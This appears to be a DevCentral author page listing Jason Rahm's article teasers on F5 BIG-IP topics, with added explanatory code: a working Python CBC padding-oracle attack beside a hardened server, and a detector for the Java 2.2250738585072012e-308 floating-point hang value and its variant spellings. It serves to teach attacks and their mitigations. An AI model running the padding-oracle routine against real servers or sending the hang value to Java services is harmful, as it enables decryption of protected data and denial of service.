It's not the Network! Ok, maybe it's the network...

Jason Rahm


Top Stories by Jason Rahm

Happy to step aside and feature a community member's content as a guest article for this post. Please welcome Leonardo Souza to the ranks of DevCentral authors! Introduction If you have upgraded an F5 device (BIG-IP) before, you have probably faced SSL/TLS compatibility issues. That is not exclusive to F5 devices; it is a general problem every time a new software version or feature is released. In theory a new version should be compatible with the previous one, but in reality it often is not. When talking about encryption we use the term SSL; however, when we start to discuss the technical details we need to differentiate SSL and TLS. I will not expand on the SSL/TLS topic, as there is a good article on DevCentral that explains how an F5 device uses SSL/TLS. Basically, TLS 1.0 is defined in RFC 2246 (1999), TLS 1.1 in RFC 4346 (2006), TLS 1.2 in RFC 5246 (2008), a... (more)

The ABCs of NSM - T is for TightVNC

Welcome back for another (long overdue) episode of the ABCs of NSM. What's NSM you say? We'll go with Network and System Management, but you could throw Security in there as well. We'll work our way through the alphabet over the next several weeks, looking at tools and concepts along the way for all the administrators out there. By the way, you can thank Joe for the format and Don for the title (I couldn't for the life of me come up with one). Today's letter T is for TightVNC. TightVNC is a remote desktop option for *nix/Windows systems that comes with both server and... (more)

Let iRules Work Around that ASP.NET Padding Oracle Attack

Microsoft released advisory 2416728 on Friday after researchers Thai Duong and Juliano Rizzo demonstrated the attack on ASP.NET with their Padding Oracle Exploit Tool. The attack itself preys on a padding oracle in ASP.NET's handling of AES-CBC encrypted data (the framework's error responses reveal whether a tampered ciphertext decrypted to valid padding), which you can read about over here at threatpost. So what's the reward for a successful attack? It's not going to allow the attacker to execute code or elevate rights, but it does allow the attacker to read potentially sensitive data that could then be further used to compromise the system. The mitigation for this attack is to obfuscate the server ... (more)
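To make the mechanism concrete, here is an added example (mine, not the post's, and not the POET tool or any ASP.NET code): a CBC padding-oracle attack run against a server that answers differently for bad padding, beside a server that answers every tampered request the same way. The block cipher is a toy Feistel construction standing in for AES so the script runs without third-party packages; the attack never looks inside the cipher, which is the point. KEY, IV and SECRET are constructed sample values.

```python
import hashlib
import hmac

BLOCK = 16


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):
    # Feistel round function: keyed hash of the round number and one 8-byte half.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key, block):
    # Toy 16-byte block cipher (4-round Feistel). Stands in for AES so the example runs
    # with the standard library only; the attack below treats it as a black box.
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right


def pad(data):
    n = BLOCK - len(data) % BLOCK          # PKCS#7: always append 1..16 bytes of value n
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1] if data else 0
    if len(data) % BLOCK or not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(prev, padded[i:i + BLOCK]))
        out += prev
    return out


def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        cur = ct[i:i + BLOCK]
        out += xor(block_decrypt(key, cur), prev)
        prev = cur
    return out


def leaky_oracle(key, iv, ct):
    # Vulnerable server: its answer reveals whether the decrypted padding was valid
    # (ASP.NET leaked this through distinguishable error responses).
    try:
        unpad(cbc_decrypt(key, iv, ct))
        return True
    except ValueError:
        return False


def mitigated_oracle(key, iv, ct):
    # Hardened server: every tampered request gets the same generic failure, so valid
    # padding cannot be told apart from invalid padding.
    return False


def recover_plaintext(oracle, iv, ct):
    """Decrypt ct without the key, using only oracle(iv, block) -> bool."""
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plaintext = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)           # block_decrypt(key, cur), learned byte by byte
        for k in range(1, BLOCK + 1):      # k: the padding value we force the server to see
            pos = BLOCK - k
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ k   # already-known bytes are set to decrypt to k
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged), cur):
                    continue
                if k == 1:
                    # A hit could be a longer padding such as \x02\x02; a genuine \x01 hit
                    # must survive a change to the byte before it.
                    forged[pos - 1] ^= 0xFF
                    still_valid = oracle(bytes(forged), cur)
                    forged[pos - 1] ^= 0xFF
                    if not still_valid:
                        continue
                inter[pos] = guess ^ k
                break
            else:
                raise RuntimeError("oracle leaks nothing; attack fails")
        plaintext += xor(bytes(inter), prev)
    return plaintext


# Constructed sample values for the demo; not real keys or captured traffic.
KEY = hashlib.sha256(b"demo key").digest()[:16]
IV = bytes(range(BLOCK))
SECRET = b"__VIEWSTATE=constructed sample token"
CIPHERTEXT = cbc_encrypt(KEY, IV, pad(SECRET))

if __name__ == "__main__":
    print(unpad(recover_plaintext(lambda iv, c: leaky_oracle(KEY, iv, c), IV, CIPHERTEXT)))
    try:
        recover_plaintext(lambda iv, c: mitigated_oracle(KEY, iv, c), IV, CIPHERTEXT)
    except RuntimeError as err:
        print("mitigated server:", err)
```

Each plaintext byte costs at most 256 oracle queries, so a 48-byte ciphertext falls in a few thousand requests, and the attacker never needs the key. Against the uniform server the first byte already fails to resolve, which is why the mitigation the post goes on to describe is about hiding the error distinction rather than about the cipher.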

BIG-IP APM–Customized Logon Page

The default logon page for the Access Policy Manager module is pretty basic, particularly so if only the minimal username and password fields are configured. However, APM is wildly flexible. In this tech tip, I'll cover customizing the logon page by adding a dropdown box of services to the standard username and password fields. Introduction Background Information The goal here is to provide access to multiple web applications behind APM through an admin-defined dropdown menu and a different LTM pool for each web application. We will be generating the list dynamically through t... (more)

Mitigate Java Vulnerability with iRules

I got a request yesterday morning asking whether there was a way to drop HTTP requests if a certain number was referenced in the Accept-Language header. The user referenced this post on Exploring Binary. The number, 2.2250738585072012e-308, causes the Java runtime and compiler to go into an infinite loop when converting it to double-precision binary floating-point. Not good. Twitter is ablaze on the issue, and there is a good discussion thread on Hacker News as well. So how do you stop it? At first, this appeared to be a no-brainer: just copy that string and drop if found in that... (more)
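The catch with a plain substring match is that the same value has many decimal spellings. As an added example (mine, in Python rather than the post's Tcl iRule, so the logic can be exercised offline), the check below parses every numeric literal in a header and compares the value it denotes against the boundary between the largest subnormal double and Java's Double.MIN_NORMAL. Flagging everything that rounds to either neighbour of that boundary is a deliberate, conservative over-approximation and my assumption, not a statement of the exact set of inputs that hung Java; scanning all headers rather than only Accept-Language is likewise an extension of this example. The header samples are constructed, not captured traffic.

```python
import re

# Boundary of the double range around which Java's decimal-to-double conversion looped:
# the largest subnormal double and the smallest normal double (Java's Double.MIN_NORMAL).
LARGEST_SUBNORMAL = float.fromhex("0x0.fffffffffffffp-1022")   # 2.225073858507201e-308
MIN_NORMAL = float.fromhex("0x1p-1022")                        # 2.2250738585072014e-308

# Any decimal literal, with or without an exponent. A substring match on one spelling of
# the number would miss "0.00022250738585072012e-304" or "22250738585072012e-324".
FLOAT_RE = re.compile(r"\d*\.?\d+(?:[eE][-+]?\d+)?")


def is_dangerous_literal(token):
    """True when the literal denotes a value in the danger zone.

    Python's float() is correctly rounded and does not share the Java bug, so parsing the
    token here is safe. Treating every value that rounds to either neighbour of the
    boundary as hostile is a conservative over-approximation (an assumption of this
    example), chosen so that rewritten spellings of the trigger cannot slip past.
    """
    try:
        value = float(token)
    except ValueError:
        return False
    return LARGEST_SUBNORMAL <= value <= MIN_NORMAL


def dangerous_numbers(header_value):
    """All numeric literals in one header value that land in the danger zone."""
    return [t for t in FLOAT_RE.findall(header_value) if is_dangerous_literal(t)]


def should_drop(headers):
    """The decision an iRule would make: drop the request if any header carries the value.

    The post mentions Accept-Language, but a Java server may parse numbers out of other
    headers too, so every header is scanned (extension of this example, not the post's rule).
    """
    return any(dangerous_numbers(v) for v in headers.values())


if __name__ == "__main__":
    # Constructed sample headers, not captured traffic.
    samples = [
        {"Accept-Language": "en-US,en;q=0.8"},
        {"Accept-Language": "en;q=2.2250738585072012e-308"},
        {"Accept-Language": "en;q=0.00022250738585072012e-304"},
        {"X-Custom": "22250738585072012e-324"},
    ]
    for h in samples:
        print("drop" if should_drop(h) else "pass", h)
```

The regex deliberately over-matches (it will pick up the 0.8 in a normal q-value), which is harmless because only the parsed value decides the outcome; the cost is one float() per literal, not a hang, because the parser doing the work is not the vulnerable one.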